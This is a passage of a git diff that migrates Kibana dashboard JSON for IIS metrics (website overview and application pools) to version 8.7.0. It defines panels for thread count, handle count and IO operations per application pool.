false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_1a1fa4d4-877e-44cb-ae33-ed1cdb800e99:optionsListDataView", - "type": "index-pattern" - } + "title": "Total GET Requests" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Website Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "d366a32e-1ed5-4089-82b4-e9e34b674c43:indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ba537347-2422-4e09-931e-c0ff3ad24ca3:indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8:indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7dbfdcf7-2742-4a48-8520-170afa068e2c:indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c01ce6f-2b93-439a-b5a0-d911da07af9b:indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6bac7104-6ff4-480a-9987-ce2e92628053:indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4f05e422-f1be-4856-be21-9be206b34834:indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b:indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0:indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce:indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "49524a34-1a10-49bf-842f-20d2606380a4:indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4:indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e:indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f0a4e232-26f6-4b33-b728-62f73cd74f08:indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_1a1fa4d4-877e-44cb-ae33-ed1cdb800e99:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json index 78334955177..64aed58d482 100644 --- a/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json +++ b/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json @@ -1,1301 +1,1318 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"44559996-134f-4279-8705-0da162d57dc9\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.application_pool.name\",\"title\":\"Application Pools\",\"id\":\"44559996-134f-4279-8705-0da162d57dc9\",\"enhancements\":{}}}}" + "id": "iis-b4108810-861c-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNywxXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"44559996-134f-4279-8705-0da162d57dc9\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.application_pool.name\",\"title\":\"Application Pools\",\"id\":\"44559996-134f-4279-8705-0da162d57dc9\",\"enhancements\":{}}}}" + }, + "description": "This dashboard shows application pools metrics for the IIS server.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 11, + "i": "bbb20379-e68e-42c9-aa22-23eec29e026d", + "w": 9, + "x": 0, + "y": 0 }, - "description": "This dashboard shows application pools metrics for the IIS server.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "bbb20379-e68e-42c9-aa22-23eec29e026d", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [**Application Pools**](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Application Pool Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", + "w": 20, + "x": 9, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [**Application Pools**](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", - "openLinksInNewTab": false + "panelIndex": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "180189b1-7216-4cf8-a803-95b53c2f6e40": { + "columnOrder": [ + "7a627f5b-b48b-44c4-876e-2139937182f6", + "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" + ], + "columns": { + "7a627f5b-b48b-44c4-876e-2139937182f6": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "type": "markdown", - "uiState": {} + "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.application_pool.process.thread_count: *" + }, + "isBucketed": false, + "label": "Thread Count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.thread_count" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 11, - "i": "bbb20379-e68e-42c9-aa22-23eec29e026d", - "w": 9, - "x": 0, - "y": 0 + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "bbb20379-e68e-42c9-aa22-23eec29e026d", - "title": "Navigation Application Pool Overview", - "type": "visualization", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "180189b1-7216-4cf8-a803-95b53c2f6e40": { - "columnOrder": [ - "7a627f5b-b48b-44c4-876e-2139937182f6", - "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" - ], - "columns": { - "7a627f5b-b48b-44c4-876e-2139937182f6": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.application_pool.process.thread_count: *" - }, - "isBucketed": false, - "label": "Thread Count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.thread_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" - ], - "layerId": "180189b1-7216-4cf8-a803-95b53c2f6e40", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "7a627f5b-b48b-44c4-876e-2139937182f6", - "yConfig": [ - { - "axisMode": "left", - "color": "#16a5a5", - "forAccessor": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "layers": [ + { + "accessors": [ + "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" + ], + "layerId": "180189b1-7216-4cf8-a803-95b53c2f6e40", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "7a627f5b-b48b-44c4-876e-2139937182f6", + "yConfig": [ + { + "axisMode": "left", + "color": "#16a5a5", + "forAccessor": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false }, - "gridData": { - "h": 11, - "i": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", - "w": 20, - "x": 9, - "y": 0 + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "panelIndex": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", - "title": "Thread Count", - "type": "lens", - "version": "8.5.0" + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e": { - "columnOrder": [ - "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", - "3479a16c-aae2-470c-8b3d-a4f4253b86c8" - ], - "columns": { - "3479a16c-aae2-470c-8b3d-a4f4253b86c8": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.application_pool.process.handle_count: *" - }, - "isBucketed": false, - "label": "Handle Count", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.handle_count" - }, - "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "3479a16c-aae2-470c-8b3d-a4f4253b86c8", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Thread Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "25c69234-9c74-4179-87f7-3be8a18e4cd9", + "w": 19, + "x": 29, + "y": 0 + }, + "panelIndex": "25c69234-9c74-4179-87f7-3be8a18e4cd9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e": { + "columnOrder": [ + "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", + "3479a16c-aae2-470c-8b3d-a4f4253b86c8" + ], + "columns": { + "3479a16c-aae2-470c-8b3d-a4f4253b86c8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.application_pool.process.handle_count: *" + }, + "isBucketed": false, + "label": "Handle Count", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "3479a16c-aae2-470c-8b3d-a4f4253b86c8" - ], - "layerId": "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", - "yConfig": [ - { - "axisMode": "left", - "color": "#653294", - "forAccessor": "3479a16c-aae2-470c-8b3d-a4f4253b86c8" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.handle_count" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3479a16c-aae2-470c-8b3d-a4f4253b86c8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 11, - "i": "25c69234-9c74-4179-87f7-3be8a18e4cd9", - "w": 19, - "x": 29, - "y": 0 + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "25c69234-9c74-4179-87f7-3be8a18e4cd9", - "title": "Handle Count", - "type": "lens", - "version": "8.5.0" + "layers": [ + { + "accessors": [ + "3479a16c-aae2-470c-8b3d-a4f4253b86c8" + ], + "layerId": "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", + "yConfig": [ + { + "axisMode": "left", + "color": "#653294", + "forAccessor": "3479a16c-aae2-470c-8b3d-a4f4253b86c8" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Handle Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", + "w": 24, + "x": 0, + "y": 11 + }, + "panelIndex": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Write Operations/s", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Write Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.io_write_operations_per_sec" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.io_write_operations_per_sec" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", - "w": 24, - "x": 0, - "y": 11 + "layers": [ + { + "accessors": [ + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68bc00", + "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true }, - "panelIndex": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", - "title": "IO Write Operations", - "type": "lens", - "version": "8.5.0" + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "IO Write Operations" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", + "w": 24, + "x": 24, + "y": 11 + }, + "panelIndex": "7f2ff86d-01f8-429f-8ff7-8d33db2b2c8e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Read Operations/s", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Read Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.io_read_operations_per_sec" - }, - "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "35c13f71-7863-401d-8da0-e13af7226004", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "80ebd176-a8e8-489f-b226-55952da7c11e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.io_read_operations_per_sec" + }, + "7f6e3ead-3933-4202-8b47-73e7a4c46c60": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "35c13f71-7863-401d-8da0-e13af7226004", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "layerId": "9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "xAccessor": "80ebd176-a8e8-489f-b226-55952da7c11e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68bc00", - "forAccessor": "35c13f71-7863-401d-8da0-e13af7226004" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "80ebd176-a8e8-489f-b226-55952da7c11e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + 